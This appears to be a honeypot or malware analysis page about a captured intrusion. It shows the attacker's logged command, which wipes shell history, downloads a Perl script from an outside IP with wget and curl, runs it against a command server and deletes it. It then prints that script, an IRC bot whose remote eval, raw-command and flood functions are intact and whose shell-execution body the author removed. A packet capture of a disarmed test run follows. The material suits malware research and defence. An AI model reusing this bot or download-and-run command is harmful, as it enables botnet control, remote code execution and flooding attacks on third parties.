IRC

20160920-125012-5970.log

Downloading a text file...

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Running exec command "unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ; wget uggc://212.154.211.81/ffu.txt ; curl -O uggc://212.154.211.81/ffu.txt ; perl ffu.txt 185.14.57.44 ; rm -rf ffu.txt* "
						

ffu.txt is a perl IRC bot:

#!/usr/bin/perl
my $processo =("[cpuset]","","[sync_supers]");

my @titi = ("index.php?page=","main.php?page=");

my $goni = $titi[rand scalar @titi];

my $linas_max='3';
my $sleep='7';
my @adms=("x", "y", "z", "w" );
my @hostauth=("local");
my @canais=("#xx");
chop (my $nick = `uname`);
my $servidor="3.4.5.6";
my $ircname =("g");
my $realname = ("g");
my @ircport = ("21","23");
my $porta = $ircport[rand scalar @ircport];
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/tmp");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         }
       }
        }
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4;
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick|".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal ddosit");
       }
   }
}



sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   }

if ($case =~ /^refresh (.*)/) {
my $goni = $titi[rand scalar @titi];
 }

   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}

sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  }
----8<--------8<--------8<--------8<--------8<--------8<----
                    REMOVED SHELL CODE
----8<--------8<--------8<--------8<--------8<--------8<----
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}
						

Connecting to the irc server on the specified ports didn't work, it just asked for Login:, so I tried running a disarmed version of ffu.txt in case I had missed something.

Same result:

20:37:23.570507 IP CLIENT.57529 > SERVER.ftp: Flags [S], seq 1770788891, win 29200, options [mss 1460,sackOK,TS val 893558695 ecr 0,nop,wscale 8], length 0       [49/3240]
E..<..@.@..K......9,....i.........r............
5B..........
20:37:23.619689 IP SERVER.ftp > CLIENT.57529: Flags [S.], seq 672731776, ack 1770788892, win 5792, options [mss 1460,sackOK,TS val 723604774 ecr 893558695,nop,wscale 7], $
ength 0
E..<..@.9.$...9,........(...i.......!Z.........
+!U&5B......
20:37:23.619861 IP CLIENT.57529 > SERVER.ftp: Flags [.], ack 1, win 115, options [nop,nop,TS val 893558707 ecr 723604774], length 0
E..4..@.@..R......9,....i...(......s.......
5B..+!U&
20:37:23.620757 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 1:12, ack 1, win 115, options [nop,nop,TS val 893558708 ecr 723604774], length 11
E..?..@.@..F......9,....i...(......s.......
5B..+!U&NICK Linux

20:37:23.669759 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 12, win 46, options [nop,nop,TS val 723604824 ecr 893558708], length 0
E..4G.@.9..9..9,........(...i..'....fN.....
+!UX5B..
20:37:23.669940 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 12:51, ack 1, win 115, options [nop,nop,TS val 893558720 ecr 723604824], length 39
E..[..@.@..)......9,....i..'(......s.......
5B..+!UXUSER g 146.185.152.192 185.14.57.44 :g

20:37:23.718935 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 51, win 46, options [nop,nop,TS val 723604873 ecr 893558720], length 0
E..4G.@.9..8..9,........(...i..N....e......
+!U.5B..
20:37:29.847008 IP SERVER.ftp > CLIENT.57529: Flags [P.], seq 1:58, ack 51, win 46, options [nop,nop,TS val 723611001 ecr 893558720], length 57
E..mG.@.9.....9,........(...i..N...........
+!my5B..:hub.63066.net 433 * Linux :Nickname is already in use.

20:37:29.847053 IP CLIENT.57529 > SERVER.ftp: Flags [.], ack 58, win 115, options [nop,nop,TS val 893560264 ecr 723611001], length 0
E..4..@.@..O......9,....i..N(......s.......
5B..+!my
20:37:29.848171 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 51:68, ack 58, win 115, options [nop,nop,TS val 893560265 ecr 723611001], length 17
E..E..@.@..=......9,....i..N(......s.......
5B..+!myNICK Linux|57428

20:37:29.897222 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 68, win 46, options [nop,nop,TS val 723611051 ecr 893560265], length 0
E..4G.@.9..6..9,........(...i.._....Gu.....
+!m.5B..
20:37:29.898030 IP SERVER.ftp > CLIENT.57529: Flags [P.], seq 58:196, ack 68, win 46, options [nop,nop,TS val 723611052 ecr 893560265], length 138
E...G.@.9.....9,........(...i.._.....#.....
+!m.5B..:hub.63066.net 001 Linux|57428 :Linux|57428!g@srv02.pwnd.land
:hub.63066.net 001 Linux|57428 :Login:
:hub.63066.net 376 Linux|57428 :

20:37:29.898232 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 68:84, ack 196, win 119, options [nop,nop,TS val 893560277 ecr 723611052], length 16
E..D..@.@..=......9,....i.._(..D...w.......
5B..+!m.JOIN #xx ddosit

20:37:29.986660 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 84, win 46, options [nop,nop,TS val 723611141 ecr 893560277], length 0
E..4G.@.9..4..9,........(..Di..o....Fu.....
+!n.5B..
20:37:29.986778 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 84:100, ack 196, win 119, options [nop,nop,TS val 893560299 ecr 723611141], length 16
E..D..@.@..<......9,....i..o(..D...w.......
5B..+!n.JOIN #xx ddosit

20:37:30.035732 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 100, win 46, options [nop,nop,TS val 723611190 ecr 893560299], length 0
E..4G.@.9..3..9,........(..Di.......F......
+!n65B..
20:39:30.023369 IP SERVER.ftp > CLIENT.57529: Flags [P.], seq 196:217, ack 100, win 46, options [nop,nop,TS val 723731178 ecr 893560299], length 21
E..IG.@.9.....9,........(..Di.......^......
+#B.5B..PING :hub.63066.net

20:39:30.023911 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 100:120, ack 217, win 119, options [nop,nop,TS val 893590308 ecr 723731178], length 20
E..H..@.@..7......9,....i...(..Y...w.......
5C.$+#B.PONG :hub.63066.net

20:39:30.073194 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 120, win 46, options [nop,nop,TS val 723731228 ecr 893590308], length 0
E..4G.@.9..1..9,........(..Yi..............
+#C.5C.$
20:41:30.025773 IP SERVER.ftp > CLIENT.57529: Flags [P.], seq 217:238, ack 120, win 46, options [nop,nop,TS val 723851181 ecr 893590308], length 21
E..IG.@.9.....9,........(..Yi..............
+%..5C.$PING :hub.63066.net

20:41:30.026639 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 120:140, ack 238, win 119, options [nop,nop,TS val 893620309 ecr 723851181], length 20
E..H..@.@..6......9,....i...(..n...w.......
5C.U+%..PONG :hub.63066.net

20:41:30.075899 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 140, win 46, options [nop,nop,TS val 723851231 ecr 893620309], length 0
E..4G.@.9../..9,........(..ni..............
+%..5C.U

20:43:18.837162 IP CLIENT.57529 > SERVER.ftp: Flags [F.], seq 140, ack 238, win 119, options [nop,nop,TS val 893647512 ecr 723851231], length 0
E..4..@.@..I......9,....i...(..n...w.......
5C..+%..
20:43:18.887514 IP SERVER.ftp > CLIENT.57529: Flags [P.], seq 238:252, ack 141, win 46, options [nop,nop,TS val 723960043 ecr 893647512], length 14
E..BG.@.9.. ..9,........(..ni.......2......
+&..5C..Disconnected					

Toggle Menu